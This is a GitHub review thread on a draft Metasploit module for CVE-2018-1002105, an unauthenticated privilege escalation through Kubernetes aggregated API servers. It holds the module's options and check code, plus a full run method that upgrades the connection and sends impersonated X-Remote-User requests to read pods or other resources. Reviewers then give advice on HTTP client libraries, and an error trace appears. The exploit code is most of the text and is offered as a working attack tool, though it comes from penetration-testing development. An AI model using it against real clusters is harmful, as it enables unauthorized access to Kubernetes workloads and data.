modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb

```diff
@@ -0,0 +1,151 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'net/http'
+require 'uri'
+require 'json'
+
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kubernetes Aggregated API Server Privilege Escalation (unauthorised)',
+      'Description'    => %q{
+    An API call to any aggregated API server endpoint can be escalated to perform any API request against that aggregated API server, as long as that aggregated API server is directly accessible from the Kubernetes API server’s network. Default RBAC policy allows all users (authenticated and unauthenticated) to perform discovery API calls that allow this escalation against any aggregated API servers configured in the cluster.
+      },
+      'Author'         =>
+        [
+          'Praveen Darshanam<praveend[dot]hac[at]gmail.com>', # metasploit module
+          'Ariel Zelivansky', # metrics api poc
+          'Vincent' # service catalog api poc
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-1002105' ],
+          [ 'BID', '106068' ],
+          [ 'URL', 'https://github.com/kubernetes/kubernetes/issues/71411' ],
+          [ 'URL', 'https://blog.disects.com/2018/12/exploiting-kubernetes-privilege.html' ]
+        ],
+      'Targets'		=>
+        [
+          ['Kubernetes', {} ]
+        ],
+      'Platform'       => ['linux', 'win'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate'  => 'Nov 09 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('AGGREGATED_API', [ true, 'Aggregates API to use for Privilege Escalation', 'v1beta1.metrics.k8s.io' ]),
+        OptString.new('API_SERVER', [ true, 'Kubernetes cluster API Server HOST/FQDN/IP Address', nil ]),
+        OptString.new('API_RESOURCE_NAME', [ true, 'Kubernetes API Resource name (pods, nodes, servicebindings, seeds, shoots etc)', nil ]),
+        OptString.new('NAMESPACE', [ false, 'Kubernetes namespace to get api-resource details from', nil ]),
+        OptString.new('X-Remote-User', [ true, 'Kubernetes User to escalate', nil ]),
+        OptString.new('X-Remote-Group', [ false, 'Kubernetes Group', nil ])
+      ])
+    deregister_options('RHOST')
+  end
+
+  def check
+    host = datastore['API_SERVER']
+    port = datastore['RPORT']
+    api_ver = datastore['AGGREGATED_API'].split('.')[0]
+    aggr_api = datastore['AGGREGATED_API'].split('.',2)[1]
+    if port != 443
+      req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}"
+    else
+      req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}"
+    end
+    print_status("Checking the presence of Aggregated API\n#{datastore['AGGREGATED_API']}")
+    Net::HTTP.start(host, port, :use_ssl => 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
```

Comment:
We have wrapped the HTTP request with `send_request_cgi`, which handles the request and some other stuff better.  Check out this [doc](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method) and other modules.

Reply:
Wanted persistence, need to send second request on the same connection as that of first, that is the reason using Net::HTTP.start

Reply:
tried 
```
  def run
    host = datastore['API_SERVER']
    port = datastore['RPORT']
    api_ver = datastore['AGGREGATED_API'].split('.')[0]
    aggr_api = datastore['AGGREGATED_API'].split('.',2)[1]
    rsource = datastore['API_RESOURCE_NAME']
    ws_req_uri = "/apis/#{aggr_api}/#{api_ver}"
    if datastore['NAMESPACE']
      pod_req_uri = "/apis/#{aggr_api}/#{api_ver}/namespaces/#{datastore['NAMESPACE']}/#{rsource}"
    else
      pod_req_uri = "/apis/#{aggr_api}/#{api_ver}/#{rsource}"
    end
    ws_cust_headers = "User-Agent: kubectl\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n"
    ws_resp = send_request_cgi({
      'uri' => ws_req_uri,
      'method' => 'GET',
      'raw_headers' => ws_cust_headers,
      'proto'=>'HTTPS',
      'port' => port,
      'ssl' => true,
      'disconnect' => false
    })
    print_status("Sending WebSocket request to API Server\n#{ws_req_uri}")

    if ws_resp.code == 200
      print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
      ws_data = JSON.parse(ws_resp.body)
      print_status(JSON.pretty_generate(ws_data))
    else
      print_error("Aggregated API Server \"#{datastore['AGGREGATED_API']}\" not found")
      http.finish
      return
    end
    pod_cust_headers = "User-Agent: kubectl\r\nX-Remote-User: #{datastore['X-Remote-User']}\r\n"
    pod_resp = send_request_cgi({
      'uri' => pod_req_uri,
      'method' => 'GET',
      'raw_headers' => pod_cust_headers,
      'proto'=>'HTTPS',
      'port' => port,
      'ssl' => true
    })
    print_status("Sending escalated API request to kubernetes Resource\n#{pod_req_uri}")

    if pod_resp.code =~ /200/
      print_good("Successfully escalated to user #{datastore['X-Remote-User']}")
      pod_data = JSON.parse(pod_resp.body)
      print_status(JSON.pretty_generate(pod_data))
    else
      print_error("Couldn't escalate to user #{datastore['X-Remote-User']}")
    end
    http.finish
  end
```
but getting below error
```
msf auxiliary(admin/http/kubernetes_aggrapiserver_privesc_unauth) > run

[-] Auxiliary failed: NoMethodError undefined method `+' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client_request.rb:431:in `set_host_header'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client_request.rb:180:in `to_s'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:245:in `send_request'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:229:in `_send_recv'
[-]   /usr/share/metasploit-framework/lib/rex/proto/http/client.rb:210:in `send_recv'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/client.rb:367:in `send_request_cgi'
[-]   /usr/share/metasploit-framework/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb:104:in `run'
[*] Auxiliary module execution completed
```

Reply:
`Rex::Proto::Http` is preferred over `Net::HTTP` where `Msf::Exploit::Remote::HttpClient` doesn't offer enough control. Give it a shot. IIRC, there's nothing stopping you from "persisting" an HTTP connection in Metasploit.